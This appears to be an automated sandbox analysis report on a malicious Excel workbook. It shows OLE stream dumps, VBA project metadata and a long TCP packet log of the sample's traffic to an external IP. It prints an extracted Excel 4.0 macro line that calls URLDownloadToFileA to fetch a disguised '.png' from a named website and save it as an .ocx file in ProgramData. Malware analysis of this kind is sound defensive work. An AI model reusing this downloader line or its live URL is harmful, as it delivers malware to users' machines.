Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . \| . # . . . @ . . . . . y w . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Ctls, File Type: data, Stream Size: 68

General
Stream Path:	Ctls
File Type:	data
Stream Size:	68
Entropy:	3.77907363839
Base64 Encoded:	False
Data ASCII:	. . . B . . . . . . . . ` . . . . . . ` . . . . . . . . . . . ( . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i .
Data Raw:	20 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 00 02 14 00 60 01 01 80 00 00 00 00 03 02 00 00 28 01 00 00 d4 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80 d8 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 1c

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 154550

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	154550
Entropy:	7.98610242414
Base64 Encoded:	True
Data ASCII:	. . . . . . . . T 8 . . . . . . . . . . / . 6 . . . . . . . . . 6 > c d } . @ { . . . < 9 . ` - . . . . " . < . * . . 6 2 \\ . . . . . [ . . . . P . ( . . . . . . . . . . . . . t . . . . . \\ . p . . . ! . . . . . . . . . . { . $ 8 . . . . . . . . . ) . . 4 . \| v U . [ < . t . . m . . 8 . . 4 . . . . ) 8 . o . P . . . . . N > . . . . . f . . . . . . . . . . . > . . / . . . ( / . . _ . $ F o . . l . . . . . . j h . . B . . . . . a . . . . . . . . . = . . . . . . . S . . . . . . . . . . . . . W . . . . . . t
Data Raw:	09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 2f 00 36 00 01 00 01 00 01 00 92 95 36 3e 63 64 7d ad 40 7b f5 0a f4 3c 39 e8 60 2d b6 bc c7 d7 22 ab 3c c4 2a 9a 0f 36 32 5c 19 f5 e4 05 cb 5b bc 99 cb 9a 50 d8 28 8c eb 19 e1 00 02 00 b0 04 c1 00 02 00 74 f3 e2 00 00 00 5c 00 70 00 df 94 21 f2 c1 f7 f6 ae 8e e7 8c 02 fd 7b db 24 38 d5 a3 8a b0 a5 02 f8 06 ce 29 af e8 34

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 387

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ISO-8859 text, with CRLF line terminators
Stream Size:	387
Entropy:	5.00967281416
Base64 Encoded:	True
Data ASCII:	I D = " { C 4 7 7 9 5 8 8 - 7 8 B C - 4 0 2 C - 9 C 2 8 - 3 4 8 E A A E D 9 5 6 B } " . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 1 A 3 5 6 9 E 5 A 9 E 5 A 9 E 5 A 9 E 5 A " . . D P B = " 5 3 5 1 A 4 F A 5 7 F B 5 7 F B 5 7 " . . G C = " 0 5 0 7 F 2 4 C 1 6 F F 1 7 F F 1 7 0 0 " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0
Data Raw:	49 44 3d 22 7b 43 34 37 37 39 35 38 38 2d 37 38 42 43 2d 34 30 32 43 2d 39 43 32 38 2d 33 34 38 45 41 41 45 44 39 35 36 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 62 6c 65 33

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 20

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	20
Entropy:	3.04643934467
Base64 Encoded:	False
Data ASCII:	. . . . 1 . . . 8 . A . B . 1 . . . . .
Data Raw:	cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2767

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	2767
Entropy:	3.97981669814
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw:	cc 61 a3 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 728

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	728
Entropy:	6.37265666305
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . ) 3 . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 d4 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 29 33 e3 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Stream Path: _VBA_PROJECT_CUR/VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 1127

General
Stream Path:	_VBA_PROJECT_CUR/VBA/\x1051\x1080\x1089\x10901
File Type:	data
Stream Size:	1127
Entropy:	3.56364076858
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . $ . . . . . . . 8 . . . . . . . . . . . . . . . H . . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . L i s t B o x 1 , 2 , 0 , M S F o r m s , L i s t B o x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . .
Data Raw:	01 16 01 00 00 14 01 00 00 18 03 00 00 f8 00 00 00 24 02 00 00 ff ff ff ff 38 03 00 00 8c 03 00 00 00 00 00 00 01 00 00 00 48 1c e9 9f 00 00 ff ff 63 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Macro 4.0 Code

CALL("URLMon", "URLDownloadToFileA", "JJCCJJ", 0, ="https://www.penrithdentalimplants.com.au/ls/apperolew.png", C:\ProgramData\activex.ocx, 0, 0)

"=""https://www.penrithdentalimplants.com.au/ls/apperolew.png""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2021 13:01:07.085342884 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:07.273987055 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:07.274081945 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:07.283557892 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:07.471865892 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:07.479675055 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:07.479729891 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:07.479768038 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:07.480004072 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:07.514084101 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:07.707853079 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:07.707982063 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:08.878242970 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.106628895 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.276684999 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.276724100 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.276753902 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.276793003 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.276828051 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.276865005 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.276901007 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.276920080 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.276947975 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.276989937 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.276989937 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277025938 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277029037 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277034998 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277065992 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277079105 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277086020 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277105093 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277134895 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277139902 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277168989 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277173042 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277200937 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277214050 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277235031 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277260065 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277267933 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277301073 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277314901 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277337074 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277348042 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277374029 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277399063 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277420998 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277442932 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277478933 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277504921 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277524948 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277530909 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277565002 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277575970 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277601004 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277602911 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277638912 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277654886 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277667046 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277686119 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277703047 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277714014 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277740002 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277741909 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277776957 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277795076 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277823925 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277822971 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277863979 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277899981 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277915001 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277936935 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.277947903 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277973890 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.277973890 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.278009892 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.278026104 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.278047085 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.278078079 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.278084040 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.278110027 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.278131008 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.278137922 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.278162956 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.278196096 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.278198957 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.278227091 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.278235912 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.278249979 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.278273106 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.278283119 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.278307915 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.278326035 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.278356075 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.283272028 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.466720104 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.466777086 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.466815948 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.466854095 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.466901064 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.466943979 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.466952085 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.466979980 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467000961 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467010021 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467037916 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467047930 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467080116 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467094898 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467108965 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467139959 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467149973 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467176914 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467196941 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467214108 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467223883 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467251062 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467256069 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467286110 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467302084 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467323065 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467333078 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467359066 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467364073 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467400074 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467406034 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467447996 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467463970 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467484951 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.467494965 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467539072 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.467813015 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.471467018 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.471525908 CET	443	49167	160.153.76.195	192.168.2.22
Jan 5, 2021 13:01:09.471599102 CET	49167	443	192.168.2.22	160.153.76.195
Jan 5, 2021 13:01:09.473033905 CET	49167	443	192.168.2.22	160.153.76.195
